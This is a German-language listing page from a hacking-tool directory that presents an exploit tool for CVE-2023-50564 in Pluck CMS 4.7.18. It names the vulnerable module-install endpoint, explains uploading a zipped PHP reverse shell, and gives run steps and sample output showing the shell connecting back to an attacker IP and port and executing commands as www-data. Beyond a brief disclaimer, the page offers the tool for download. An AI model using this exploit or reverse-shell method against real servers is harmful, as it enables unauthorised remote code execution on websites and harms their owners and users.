Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-50564 — Dieses Skript nutzt die Datei-Upload-Funktion in Pluck CMS v4.7.18 aus, um eine schädliche PHP-Datei hochzuladen, die Remote-Zugriff über eine Reverse-Shell ermöglicht. Nach dem Hochladen gewährt diese Hintertür dem Angreifer Serverzugriff mit Webserver-Berechtigungen und ermöglicht weitere Aktionen innerhalb des Systems oder Netzwerks. | Kitploit
Tools/GitHubGitHub/mrterrestrial/cve-2023-50564
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubmrterrestrial/cve-2023-50564

CVE-2023-50564

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

1vor 1 JahrNoch nicht geprüft

Dieses Skript nutzt die Datei-Upload-Funktion in Pluck CMS v4.7.18 aus, um eine schädliche PHP-Datei hochzuladen, die Remote-Zugriff über eine Reverse-Shell ermöglicht. Nach dem Hochladen gewährt diese Hintertür dem Angreifer Serverzugriff mit Webserver-Berechtigungen und ermöglicht weitere Aktionen innerhalb des Systems oder Netzwerks.

Teilen

CVE-2023-50564 - Pluck CMS v4.7.18 Exploit

Übersicht

Dieses Skript nutzt eine authentifizierte Schwachstelle für beliebigen Dateiupload in Pluck CMS v4.7.18 (CVE-2023-50564) aus. Durch die Ausnutzung dieser Schwachstelle kann ein authentifizierter Angreifer eine schädliche PHP-Datei hochladen und so die Ausführung von beliebigem Code (in diesem Fall eine Reverse Shell) ermöglichen.

Details zum Exploit

  • CVE-ID: CVE-2023-50564
  • Betroffene Version: Pluck CMS v4.7.18
  • Typ: Authentifizierter beliebiger Dateiupload
  • Auswirkung: Remote Code Execution (RCE)

Die Schwachstelle existiert im Endpunkt /admin.php?action=installmodule, der es einem authentifizierten Benutzer erlaubt, eine ZIP-Datei mit beliebigen Dateien hochzuladen. Durch das Hochladen einer schädlichen PHP-Datei richtet dieser Exploit eine Reverse Shell zurück zum Angreifer ein.

Anforderungen

  • Python 3.x
  • requests-Modul: pip install requests
  • requests-toolbelt-Modul: pip install requests-toolbelt

Dieses Skript erfordert außerdem einen gültigen Login für die Pluck-CMS-Instanz, einschließlich der URL und des Passworts des Zielsystems.

Funktionen des Exploits

  • Reverse Shell: Der Exploit lädt eine PHP-Reverse-Shell auf das Ziel hoch und verbindet sich zurück zum Rechner des Angreifers.
  • Interaktive Befehlsausführung: Sobald die Reverse Shell hergestellt ist, können auf dem Zielsystem interaktiv Befehle ausgeführt werden.
  • Erkennung von Passwortabfragen: Der Exploit erkennt Passwortabfragen (z. B. su, sudo -l) und ermöglicht es dem Benutzer, Eingaben manuell vorzunehmen.

Verwendung

Schritte zum Ausführen des Exploits

  1. Repository klonen:
    root@kitploit:~
    git clone https://github.com/yourusername/Pluck-CMS-Exploit.git
    cd Pluck-CMS-Exploit
    
  2. Erforderliche Python-Pakete installieren: Stellen Sie sicher, dass die erforderlichen Pakete installiert sind:
root@kitploit:~
pip install requests requests-toolbelt
  1. Exploit ausführen: Das Skript benötigt vier Eingaben: die Ziel-URL, das CMS-Passwort, Ihre IP-Adresse (für die Reverse Shell) und den Port, auf dem Sie lauschen möchten.

Führen Sie den Exploit mit Python aus:

root@kitploit:~
 python3 exploit.py
  1. Eingaben vornehmen, wenn Sie dazu aufgefordert werden:
  • Geben Sie die Ziel-URL ein (z. B. example.com).
  • Geben Sie das Passwort zur Authentifizierung am CMS ein.
  • Geben Sie Ihre IP-Adresse für die Reverse-Shell-Verbindung ein.
  • Geben Sie den Port ein, auf dem Sie auf die Reverse Shell lauschen möchten.
  1. Interaktive Shell: Sobald die Reverse Shell hergestellt ist, erhalten Sie eine Shell>-Eingabeaufforderung zur Interaktion mit dem Zielsystem.

Beispiel:

root@kitploit:~
 $ python3 exploit.py
 Enter the target URL (e.g., example.com): pluckcms.vulnerable.com
 Enter the password for target authentication: password123
 Enter your IP (for reverse shell): 10.10.14.5
 Enter the port to listen on (for reverse shell): 4444
 [*] Authenticating to the target...
 [+] Authentication successful.
 [*] Generating reverse shell PHP file...
 [+] Reverse shell PHP file created successfully as 'shell.php'.
 [*] Creating ZIP payload...
 [+] ZIP file created as 'payload.zip'.
 [*] Starting reverse shell listener on 10.10.14.5:4444 ...
 [*] Uploading payload to the target...
 [+] Payload uploaded successfully.
 [*] Triggering reverse shell at: http://pluckcms.vulnerable.com/data/modules/payload/shell.php
 [+] Connection received from ('10.10.10.1', 55678)
 Shell> whoami
 www-data

Funktionsweise des Exploits

  • Authentifizierung: Das Skript meldet sich mit den angegebenen Anmeldedaten am CMS an.
  • Dateiupload: Es erstellt ein ZIP-Archiv, das eine PHP-Reverse-Shell enthält, und lädt es auf den verwundbaren Endpunkt (/admin.php?action=installmodule) hoch.
  • Reverse Shell: Das Skript löst die hochgeladene PHP-Datei aus und stellt eine Reverse-Shell-Verbindung zurück zum Rechner des Angreifers her.

CVE-Details

  • CVE-ID: CVE-2023-50564
  • Verwundbarer Endpunkt: /admin.php?action=installmodule
  • Verwundbare Version: Pluck CMS v4.7.18
  • Typ: Authentifizierter beliebiger Dateiupload

Haftungsausschluss

Dieses Skript ist für Bildungszwecke und ethisches Hacken gedacht. Es sollte nur in Umgebungen verwendet werden, in denen Sie die ausdrückliche Erlaubnis zum Testen haben. Der Autor ist nicht für jeglichen Missbrauch dieses Tools verantwortlich.

Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe MIT-Lizenz für Details.

Mitwirken

Sie können das Repository gerne forken und Pull-Requests einreichen. Bei Problemen oder Feature-Wünschen eröffnen Sie bitte ein Issue auf GitHub.

Tool herunterladen